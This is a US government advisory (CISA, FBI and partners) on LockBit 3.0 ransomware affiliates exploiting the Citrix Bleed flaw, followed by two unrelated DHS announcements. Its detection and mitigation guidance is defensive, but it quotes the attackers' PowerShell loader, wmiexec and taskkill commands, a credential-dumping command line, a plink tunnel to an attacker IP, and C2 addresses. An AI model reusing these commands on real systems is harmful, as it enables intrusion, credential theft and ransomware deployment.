#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

Source: US Department of Homeland Security

SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.

This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.

Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.

Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.

CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.

The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.

Download the PDF version of this report:

For the Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool

CVE-2023-4966

CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].

After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.

Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]:

  • NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
  • NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
  • NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
  • NetScaler ADC and NetScaler Gateway version 12.1 (EOL)
  • NetScaler ADC 13.1FIPS before 13.1-37.163
  • NetScaler ADC 12.1-FIPS before 12.1-55.300
  • NetScaler ADC 12.1-NDcPP before 12.1-55.300

Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

Threat Actor Activity

Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.

$y = “TVqQAAMA…

$x = “RyEHABFQ…

$filePath = “C:UsersPublicadobelib.dll”

$fileBytes = [System.Convert]::FromBase64String($y + $x)

[System.IO.File]::WriteAllBytes($filePath, $fileBytes)

The resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32.

rundll32 C:UsersPublicadobelib.dll,main <104 hex char key>

The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.

Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.

INDICATORS OF COMPROMISE (IOCS)

See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.

[Fidelity] Legend:

  • High = Indicator is unique or highly indicates LockBit in an environment.
  • Medium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.
  • Low = Indicates tools that are commonly used but were used by LockBit.

Low confidence indicators may not be related to ransomware.

Table 1: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

192.229.221[.]95

IP

Low

Mag.dll calls out to this IP address. Ties back to dns0.org. Should run this DLL in a sandbox, when possible, to confirm C2. IP is shared hosting.

123.ps1

PowerShell script

High

Creates and executes payload via script.

193.201.9[.]224

IP

High

FTP to Russian geolocated IP from compromised system

62.233.50[.]25

IP

High

Russian geolocated IP from compromised system

Hxxp://62.233.50[.]25/en-us/docs.html

Hxxp://62.233.50[.]25/en-us/test.html

51.91.79[.].17

IP

Med

Temp.sh IP

Teamviewer

Tool (Remote Admin)

Low

70.37.82[.]20

IP

Low

IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc.

185.17.40[.]178

IP

Low

Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address

Table 2: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

185.229.191.41

Anydesk Usage

High

Anydesk C2

81.19.135[.]219

IP

High

Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta

Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta

45.129.137[.]233

IP

Medium

Callouts from known compromised device beginning during the compromised window.

185.229.191[.]41

Anydesk Usage

High

Anydesk C2

Plink.exe

Command interpreter

High

Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows.

AnyDeskMSI.exe

Remote admin tool

High

We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently.

SRUtility.exe

Splashtop utility

9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a

Netscan exe

Network scanning software

High

498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155

Table 3: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Scheduled task:

MEGAMEGAcmd

Persistence

High

Scheduled task:

UpdateAdobeTask

Persistence

High

Mag.dll

Persistence

High

Identified as running within UpdateAdobeTask cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63

123.ps1

Script

High

Creates rundll32 C:UsersPublicadobelib.dll,main ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44

Adobelib.dll

Persistence

Low

C2 from adobelib.dll.

Adobe-us-updatefiles[.]digital

Tool Download

High

Used to download obfuscated toolsets

172.67.129[.]176

Tool Download

High

IP of adobe-us-updatefiles[.]digital

104.21.1[.]180

Tool Download

High

Adobe-us-updatefiles[.]digital

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c query user 1> \127.0.0.1admin$__1698617793[.]44 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex

Command

High

wmiexec.exe usage

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618133[.]54 2>&1

Command

High

wmiexec.exe usage

cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618203[.]51 2>&1

Command

High

The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]* class C network and review for MSHTA being called with HTTP arguments [3].

Table 4: LockBit 3.0 Affiliate Citrix Bleed Campaign

Indicator

Type

Fidelity

Description

Notes

81.19.135[.]219

IP

High

Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta

81.19.135[.]220

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

81.19.135[.]226

IP

High

Russian geolocated IP, seen outbound in logs

IP registered to a South African Company

Table 5: Citrix Bleed Indicators of Compromise (IOCs)

Type

Indicator

Description

Filename

c:usersdownloadsprocess hacker 2peview.exe

Process hacker

Filename

c:usersmusicprocess hacker 2processhacker.exe

Process hacker

Filename

psexesvc.exe

Psexec service excutable

Filename

c:perflogsprocesshacker.exe

Process hacker

Filename

c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe

Process hacker transferred via screenconnect

Filename

c:perflogslsass.dmp

Lsass dump

Filename

c:usersdownloadsmimikatz.exe

Mimikatz

Filename

c:usersdesktopproc64proc.exe

Procdump

Filename

c:usersdocumentsveeam-get-creds.ps1

Decrypt veeam creds

Filename

secretsdump.py

Impacket installed on azure vm

Cmdline

secretsdump.py /@ -outputfile 1

Impacket installed on azure vm

Filename

ad.ps1

Adrecon found in powershell transcripts

Filename

c:perflogs64-bitnetscan.exe

Softperfect netscan

Filename

tniwinagent.exe

Total network inventory agent

Filename

psexec.exe

Psexec used to deploy screenconnect

Filename

7z.exe

Used to compress files

Tool

Action1

RMM

Tool

Atera

RMM

tool

anydesk

rmm

tool

fixme it

rmm

tool

screenconnect

rmm

tool

splashtop

rmm

tool

zoho assist

rmm

ipv4

101.97.36[.]61

zoho assist

ipv4

168.100.9[.]137

ssh portforwarding infra

ipv4

185.20.209[.]127

zoho assist

ipv4

185.230.212[.]83

zoho assist

ipv4

206.188.197[.]22

powershell reverse shell seen in powershell logging

ipv4

54.84.248[.]205

fixme ip

Ipv4

141.98.9[.]137

Remote IP for CitrixBleed

domain

assist.zoho.eu

zoho assist

filename

c:perflogs1.exe

connectwise renamed

filename

c:perflogsrun.exe

screenconnect pushed by psexec

filename

c:perflogs64-bitm.exe

connectwise renamed

filename

c:perflogs64-bitm0.exe

connectwise renamed

filename

c:perflogsza_access_my_department.exe

zoho remote assist

filename

c:usersmusicza_access_my_department.exe

zoho remote assist

filename

c:windowsservicehost.exe

plink renamed

filename

c:windowssysconf.bat

runs servicehost.exe (plink) command

filename

c:windowstempscreenconnect23.8.5.8707filesazure.msi

zoho remote assist used to transfer data via screenconnect

cmdline

echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw

plink port forwarding

domain

eu1-dms.zoho[.]eu

zoho assist

domain

fixme[.]it

fixme it

domain

unattended.techninline[.]net

fixme it

MITRE ATT&CK Tactics and Techniques

See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 6: ATT&CK Techniques for Enterprise: Discovery

Technique Title

ID

Use

System Information Discovery

T1082

Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches.

Table 7: ATT&CK Techniques for Enterprise: Credential Access

Technique Title

ID

Use

Modify Authentication Process: Multifactor Authentication

T1556.006

Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access.

Steal Web Session Cookie

T1539

Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens.

DETECTION METHODS

Hunting Guidance

Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.

For IP addresses:

  • Identify if NetScaler logs the change in IP.
  • Identify if users are logging in from geolocations uncommon for your organization’s user base.
  • If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed.

Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.

The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:

  • Search for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.
  • LockBit 3.0 actors were seen using the C:Temp directory for loading and the execution of files.
  • Investigate requests to the HTTP/S endpoint from WAF.
  • Hunt for suspicious login patterns from NetScaler logs
  • Hunt for suspicious virtual desktop agent Windows Registry keys
  • Analyze memory core dump files.

Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [2]:

YARA Rules

CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)

rule CISA_10478915_01 : trojan installs_other_components

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “installs-other-components”

malware_Type = “trojan”

tool_type = “information-gathering”

description = “Detects trojan .bat samples”

sha256 = “98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9”

strings:

$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }

$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73

5c 65 6d }

$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64

6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }

condition:

all of them

}

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named ‘z.txt’ located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:

  • c:windowstasksem.cab
  • c:windowstasksam.cab
  • c:windowstasksa.cab

rule CISA_10478915_02 : trojan installs_other_components

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “installs-other-components”

malware_type = “trojan”

tool_type = “unknown”

description = “Detects trojan PE32 samples”

sha256 = “e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068”

strings:

$s1 = { 57 72 69 74 65 46 69 6c 65 }

$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }

$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }

$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }

$s5 = { 64 65 6c 65 74 65 5b 5d }

$s6 = { 4e 41 4e 28 49 4e 44 29 }

condition:

uint16(0) == 0x5a4d and pe.imphash() == “6e8ca501c45a9b85fff2378cffaa24b2” and pe.size_of_code == 84480 and all of

them

}

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message “[*]success” in the console.

rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “steals-authentication-credentials”

malware_type = “trojan”

tool_type = “credential-exploitation”

description = “Detects trojan DLL samples”

sha256 = “17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994”

strings:

$s1 = { 64 65 6c 65 74 65 }

$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }

$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }

$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }

$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }

$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }

condition:

uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of

them

}

This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.

Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.

rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access

{

meta:

author = “CISA Code & Media Analysis”

incident = “10478915”

date = “2023-11-06”

last_modified = “20231108_1500”

actor = “n/a”

family = “n/a”

capabilities = “communicates-with-c2”

malware_type = “backdoor”

tool_type = “remote-access”

description = “Detects trojan python samples”

sha256 = “906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6”

strings:

$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }

$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }

$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }

$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }

condition:

all of them

}

This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword “hashpasswd” is present. If the keyword “hashpasswd” is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.

Open Source YARA Rule

Import "pe"

rule M_Hunting_Backdoor_FREEFIRE

{

meta: author = "Mandiant"

description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"

 md5 = "eb842a9509dece779d138d2e6b0f6949"

malware_family = "FREEFIRE"

strings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??

}

condition:

uint16(0) == 0x5A4D

and filesize >= 5KB

and pe.imports("mscoree.dll")

and all of them }

INCIDENT RESPONSE

Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.

If a potential compromise is detected, organizations should:

  1. Quarantine or take offline potentially affected hosts.
  2. Reimage compromised hosts.
  3. Create new account credentials.
  4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
    • Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.
  5. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). If outside of the US, please contact your national cyber center.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.

For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.

The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

  • Isolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.
  • Secure remote access tools by:
    • Implement application controls to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
  • Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E].
  • Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].
  • Enable enhanced PowerShell logging [CPG 2.T, 2.U].
    • PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use.
    • Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging).
    • The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
    • Use longer passwords consisting of at least 15 characters [CPG 2.B].
    • Store passwords in hashed format using industry-recognized password managers.
    • Add password user “salts” to shared login credentials.
    • Avoid reusing passwords [CPG 2.C].
    • Implement multiple failed login attempt account lockouts [CPG 2.G].
    • Disable password “hints.”
    • Require administrator credentials to install software.
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
    • Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 1).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

ACKNOWLEDGEMENTS

Boeing contributed to this CSA.

REFERENCES

[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966

[2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966

[3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)

VERSION HISTORY

November 21, 2023: Initial version.

2024 AEP Info Session #1

Source: US Department of Homeland Security

The Department of Homeland Security and Office of the Director of National Intelligence invites you to attend an upcoming 2024 Public-Private Analytic Exchange Program (AEP) Virtual Info Sessions.

The AEP is sponsored by the Department of Homeland Security’s (DHS) Office of Intelligence and Analysis (I&A), on behalf of the Office of the Director of National Intelligence. DHS I&A Private Sector Engagement facilitates collaborative partnerships between members of the private sector and experienced U.S. government analysts to form several teams to address national security and homeland security issues. Participants work to create UNCLASSIFIED joint analytic deliverables of interest to both the private sector and the U.S. government. You must be a U.S. Citizen to participate.

The info sessions will include a detailed overview of the AEP, importance of the program, relationships built between the public and private sector, and how to apply for the 2024 AEP. You will hear former AEP participants share their experience. We encourage everyone to come with questions for discussion, as the AEP staff looks forward to socializing the program with you.

Session #1: Tuesday, November 21, 2023, 12:00 pm to 12:45 pm EDT. Register here.

If you are unable to attend this session, the AEP staff will host four additional info sessions on November 28th, November 30th, December 12th, and December 14th at 12:00pm EDT. Please search the DHS events page for information on how to join those sessions. Please note that each session will provide the same information, so it is only necessary to participate in one of them.

We are excited to promote this incredible program. We invite partners to ask questions during the call. Please share this announcement with colleagues across the public and private sector. We hope you can join!

For more information, check out our website

Please contact the AEP Staff at AEP@hq.dhs.gov with any questions.

USCIS Announces Availability of Additional H-2B Visas for Fiscal Year 2024

Source: US Department of Homeland Security

